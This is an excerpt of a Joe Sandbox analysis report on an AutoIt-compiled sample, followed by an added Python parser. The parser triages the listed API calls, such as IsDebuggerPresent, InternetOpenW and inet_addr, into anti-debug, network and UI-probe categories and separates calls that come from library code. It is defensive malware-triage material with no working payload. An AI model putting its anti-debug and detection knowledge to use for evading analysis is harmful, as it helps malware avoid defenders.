                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Message_doexit
                                                            • String ID: AutoIt$Error allocating memory.
                                                            • API String ID: 1993061046-4017498283
                                                            • Opcode ID: 8351f83f7f2949954411bf9d6e94bce55d099468274e9ea693184c580b304c81
                                                            • Instruction ID: 93c56595579c0e4a8b8f079b55a74090d1ec7542d30c01f48a4be5254f742de0
                                                            • Opcode Fuzzy Hash: 8351f83f7f2949954411bf9d6e94bce55d099468274e9ea693184c580b304c81
                                                            • Instruction Fuzzy Hash: E3D012322D535836D21432A46D0AFD965484B26B52F104426BB08555D38BE199E24299
                                                            APIs
                                                              • Part of subcall function 001DB564: _memset.LIBCMT ref: 001DB571
                                                              • Part of subcall function 001C0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,001DB540,?,?,?,001A100A), ref: 001C0B89
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,001A100A), ref: 001DB544
                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,001A100A), ref: 001DB553
                                                            Strings
                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 001DB54E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                            • API String ID: 3158253471-631824599
                                                            • Opcode ID: 423d7b803e89830f8526cb239cca4f9ca68bd2761bcedd19e95c624c0b8bc1a9
                                                            • Instruction ID: fef0627027d47d6fc1a5d47b2ffb1c7b50b27414f17ad2b52108b22251e3811c
                                                            • Opcode Fuzzy Hash: 423d7b803e89830f8526cb239cca4f9ca68bd2761bcedd19e95c624c0b8bc1a9
                                                            • Instruction Fuzzy Hash: B0E06D74604350CFD365DF69F6487427BE0AB15754F018A2DF846C6350D7B4E809CBA1
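The function entries above follow one fixed layout (an "APIs" list with optional "Part of subcall function" lines, a "Strings" list with xrefs, the "Memory Dump Source" and "Similarity" metadata). The parser below, an added example that is not part of the Joe Sandbox report or its tooling, turns entries in that layout into records and does a first-pass triage: it groups direct calls by a small, assumed category table (anti-debug, network, UI probing) and flags records whose strings come from well-known runtime code rather than the sample's own logic. The record with IsDebuggerPresent and OutputDebugStringW above is the standard ATL CAtlBaseModule constructor (the "Unable to initialize critical section in CAtlBaseModule" message is its literal), and the "Error allocating memory." MessageBox is the AutoIt runtime's own handler, so those hits explain the generic anti-debug signature in the report header but say nothing sample-specific. The sample text embedded in the block is constructed from entries on this page, with the per-dump "Associated" lines trimmed for brevity; the category and library-origin tables are assumptions, not part of the report.

```python
"""Parse Joe Sandbox function-listing entries and triage the API calls.

Added example, not Joe Sandbox code.  Assumes the per-record layout seen on
this page: a line 'APIs', bullet lines of calls, then 'Strings',
'Memory Dump Source', 'Joe Sandbox IDA Plugin' and 'Similarity' sections.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# One direct call line or one 'Part of subcall function' line.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-F]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
KV_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")
STRING_RE = re.compile(r"^\s*•\s*(?P<text>.*), xrefs: (?P<xref>[0-9A-F]+)\s*$")
SECTIONS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Assumed triage tables; the report itself defines no such categories.
SUSPICIOUS = {
    "anti-debug": {"IsDebuggerPresent", "OutputDebugStringW", "OutputDebugStringA"},
    "network": {"InternetOpenW", "InternetSetOptionW", "inet_addr", "htons"},
    "ui-probe": {"SendMessageW", "GetClassNameW", "GetMenuItemInfoW"},
}
# Literals that belong to well-known runtime/library code, so a hit is not
# evidence of sample-specific behaviour (assumed mapping).
LIBRARY_STRINGS = {
    "ERROR : Unable to initialize critical section in CAtlBaseModule": "ATL CAtlBaseModule ctor",
    "Error allocating memory.": "AutoIt runtime",
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    caller: Optional[str] = None  # set for 'Part of subcall function' lines


@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    meta: dict = field(default_factory=dict)


def parse_listing(text: str) -> List[FunctionRecord]:
    """Split the listing at each 'APIs' line and parse the sections that follow."""
    records: List[FunctionRecord] = []
    rec: Optional[FunctionRecord] = None
    section = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            rec = FunctionRecord()
            records.append(rec)
            section = "apis"
            continue
        if rec is None:
            continue
        if stripped in SECTIONS:
            section = stripped
            continue
        if section == "apis":
            m = API_RE.match(line)
            if m:
                args = m["args"].split(",") if m["args"] is not None else []
                rec.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["caller"]))
            continue
        if section == "Strings":
            m = STRING_RE.match(line)
            if m:
                rec.strings.append(m["text"])
            continue
        m = KV_RE.match(line)
        if m:
            if m["key"] == "Associated":  # several per record; keep them all
                rec.meta.setdefault("Associated", []).append(m["val"])
            else:
                rec.meta[m["key"]] = m["val"]
    return records


def triage(rec: FunctionRecord):
    """Return (sorted category tags of direct calls, library origin or None)."""
    tags = {tag for call in rec.apis if call.caller is None
            for tag, names in SUSPICIOUS.items() if call.name in names}
    candidates = list(rec.strings) + rec.meta.get("String ID", "").split("$")
    origin = next((LIBRARY_STRINGS[s] for s in candidates if s in LIBRARY_STRINGS), None)
    return sorted(tags), origin


# Constructed sample in the page's layout (entries taken from this page).
SAMPLE = """\
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00212520
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00212549
Strings
Memory Dump Source
• Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
APIs
  • Part of subcall function 0021830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,002180C8,?,00000000,?,?), ref: 00218322
• inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 002180CB
• htons.WSOCK32(00000000,?,00000000), ref: 00218108
Strings
Similarity
• API ID: ByteCharMultiWidehtonsinet_addr
• String ID: 255.255.255.255
APIs
  • Part of subcall function 001DB564: _memset.LIBCMT ref: 001DB571
• IsDebuggerPresent.KERNEL32(?,?,?,001A100A), ref: 001DB544
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,001A100A), ref: 001DB553
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 001DB54E
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
"""

if __name__ == "__main__":
    for r in parse_listing(SAMPLE):
        tags, origin = triage(r)
        direct = [f"{c.name}@{c.ref}" for c in r.apis if c.caller is None]
        print(r.meta.get("API ID"), direct, tags, origin or "sample code")
```

Only direct calls count toward the tags; calls reached through "Part of subcall function" lines are kept on the record but belong to the callee, so attributing them to the caller would double-count across the listing.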